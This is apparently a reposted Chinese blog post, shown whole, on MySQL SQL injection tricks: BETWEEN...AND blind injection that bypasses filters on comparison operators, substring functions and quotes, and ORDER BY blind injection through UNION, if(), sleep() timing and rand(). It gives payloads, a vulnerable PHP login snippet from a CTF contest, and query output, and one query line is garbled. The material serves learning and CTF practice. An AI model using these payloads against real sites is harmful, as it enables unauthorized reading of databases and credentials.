SQL注入的两个小Trick与总结

栏目: 数据库 · Mysql · 发布时间: 6年前

内容简介:最近发现了两个关于sql注入的小trick,分享一下.操作符 BETWEEN … AND 会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。

SQL注入的两个小Trick与总结

最近发现了两个关于 sql 注入的小trick,分享一下.

between and 操作符代替比较符

操作符 BETWEEN … AND 会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。

between and 有数据比较功能 

exp1 between min and max

如果exp1的结果处于min和max之间,`between and`就返回`1`,反之返回`0`.

示例

mysql> select * from user;
+----+----------+----------------------------------+-------------------+
| id | username | password                         | email             |
+----+----------+----------------------------------+-------------------+
|  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
|  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
|  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com |
|  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
+----+----------+----------------------------------+-------------------+
mysql> select * from user where id between 1 and 2;
+----+----------+----------------------------------+-------------------+
| id | username | password                         | email             |
+----+----------+----------------------------------+-------------------+
|  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
|  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
+----+----------+----------------------------------+-------------------+

大多数数据库都支持 between and 操作,但是对于边界的处理有所不同,在 mysql 中, between and 是包含边界的,在数学中也就是 [min,max]

在盲注中应用

between and 可以用来在过滤了 = , like , regexp , > , < 的情况下使用. 

mysql> select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set (0.00 sec)

1. 配合截取函数使用 

mysql> select mid(database(),1,1) between 'a' and 'a' ;
+-----------------------------------------+
| mid(database(),1,1) between 'a' and 'a' |
+-----------------------------------------+
|                                       0 |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> select mid(database(),1,1) between 't' and 't' ;
+-----------------------------------------+
| mid(database(),1,1) between 't' and 't' |
+-----------------------------------------+
|                                       1 |
+-----------------------------------------+
1 row in set (0.00 sec)

2. 截取函数被过滤

表达式

select exp between min and max

在截取字符函数被过滤的时候,设置 minmax 的方式有所改变.

测试1

mysql> select 'b' between 'a' and 'c';
+-------------------------+
| 'b' between 'a' and 'c' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select 'b' between 'a' and 'b';
+-------------------------+
| 'b' between 'a' and 'b' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select 'b' between 'b' and 'c';
+-------------------------+
| 'b' between 'b' and 'c' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

测试2

mysql> select 'bcd' between 'a' and 'c';
+---------------------------+
| 'bcd' between 'a' and 'c' |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select 'bcd' between 'a' and 'b';
+---------------------------+
| 'bcd' between 'a' and 'b' |
+---------------------------+
|                         0 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select 'bcd' between 'b' and 'c';
+---------------------------+
| 'bcd' between 'b' and 'c' |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)

由测试可知,当 exp 为单个字符时三种区间返回值都是 1 ,但是当 exp 为字符串时,当区间为 a-b 时,返回值为 0 .区间为 a-c 或者 b-c 时,返回值为 1 .

也就是在进行字符串比较时,只会包含一边的值,也就是 [b,c) .

所以在实际利用时,就要注意区间的范围.

实际测试

mysql> select database() between 'a' and 'z';
+--------------------------------+
| database() between 'a' and 'z' |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.05 sec)
...
mysql> select database() between 't' and 'z';
+--------------------------------+
| database() between 't' and 'z' |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'u' and 'z';
+--------------------------------+
| database() between 'u' and 'z' |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (0.00 sec)

由结果可知,第一个字符为 t

第二个字符

mysql> select database() between 'tatest
+----------------------------------+test
| database() between 'ta' and 'tz' |test
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'te' and 'tz';
+----------------------------------+
| database() between 'te' and 'tz' |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'tf' and 'tz';
+----------------------------------+
| database() between 'tf' and 'tz' |
+----------------------------------+
|                                0 |
+----------------------------------+
1 row in set (0.00 sec)

剩下的以此类推.最终为 test .

3. 单引号被过滤

between and 还支持16进制,所以可以用16进制,来绕过单引号的过滤.

测试

mysql> select database() between 0x61 and 0x7a; //select database() between 'a' and 'z';
+----------------------------------+
| database() between 0x61 and 0x7a |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 0x74 and 0x7a; //select database() between 't' and 'z';
+----------------------------------+
| database() between 0x74 and 0x7a |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 0x75 and 0x7a; //select database() between 'u' and 'z';
+----------------------------------+
| database() between 0x75 and 0x7a |
+----------------------------------+
|                                0 |
+----------------------------------+
1 row in set (0.00 sec)

了解order by

order by是mysql中对查询数据进行 排序 的方法,

使用示例

select * from 表名 order by 列名(或者数字) asc;升序(默认升序)
select * from 表名 order by 列名(或者数字) desc;降序

这里的重点在于order by后既可以填列名或者是一个数字。举个例子:

id是user表的第一列的列名,那么如果想根据id来排序,有两种写法:

select * from user order by id;
selecr * from user order by 1;

order by盲注

结合union来盲注

这个是在安恒杯月赛上看到的。

后台关键代码

$sql = 'select * from admin where username='".$username."'';
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)&&row['username']!="admin"){
    $hit="username error!";
}else{
    if ($row['password'] === $password){
        $hit="";
    }else{
        $hit="password error!";
    }

}

payload

username=admin' union 1,2,'字符串' order by 3

sql语句就变为

select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3;

这里就会对第三列进行比较,即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。

注意的是最好加上binary,因为order by比较的时候不区分大小写。

基于if()盲注

需要知道列名

order by的列不同,返回的页面当然也是不同的,所以就可以根据排序的列不同来盲注。

示例:

order by if(1=1,id,username);

这里如果使用数字代替列名是不行的,因为if语句返回的是字符类型,不是整型。

不需要知道列名

payload

order by if(表达式,1,(select id from information_schema.tables))

如果表达式为false时,sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,导致查询内容为空,如果表达式为true是,则会返回正常的页面。

基于时间的盲注

payload

order by if(1=1,1,sleep(1))

测试结果

select * from ha order by if(1=1,1,sleep(1)); #正常时间
select * from ha order by if(1=2,1,sleep(1)); #有延迟

测试的时候发现延迟的时间并不是sleep(1)中的1秒,而是大于1秒。

最后发现延迟的时间和所查询的数据的条数是成倍数关系的。

计算公式:

延迟时间=sleep(1)的秒数*所查询数据条数

我所测试的ha表中有五条数据,所以延迟了5秒。如果查询的数据很多时,延迟的时间就会很长了。

在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。

基于rang()的盲注

原理不赘述了,直接看测试结果

mysql> select * from ha order by rand(true);
+----+------+
| id | name |
+----+------+
|  9 | NULL |
|  6 | NULL |
|  5 | NULL |
|  1 | dss  |
|  0 | dasd |
+----+------+
mysql> select * from ha order by rand(false);
+----+------+
| id | name |
+----+------+
|  1 | dss  |
|  6 | NULL |
|  0 | dasd |
|  5 | NULL |
|  9 | NULL |
+----+------+

可以看到当rang()为true和false时,排序结果是不同的,所以就可以使用rang()函数进行盲注了。

order by rand(ascii(mid((select database()),1,1))>96)

后记

order by 注入在crf里其实出现挺多了,一直没有总结过.这次比较全的整理了一下(自认为比较全.XD),就和 between and 一起发出来了.欢迎师傅交流学习.


以上所述就是小编给大家介绍的《SQL注入的两个小Trick与总结》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
Remote

Remote

Jason Fried、David Heinemeier Hansson / Crown Business / 2013-10-29 / CAD 26.95

The “work from home” phenomenon is thoroughly explored in this illuminating new book from bestselling 37signals founders Fried and Hansson, who point to the surging trend of employees working from hom......一起来看看 《Remote》 这本书的介绍吧!

码农工具
在线进制转换器
在线进制转换器

各进制数互转换器

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2024 码农网 粤ICP备17054400号-3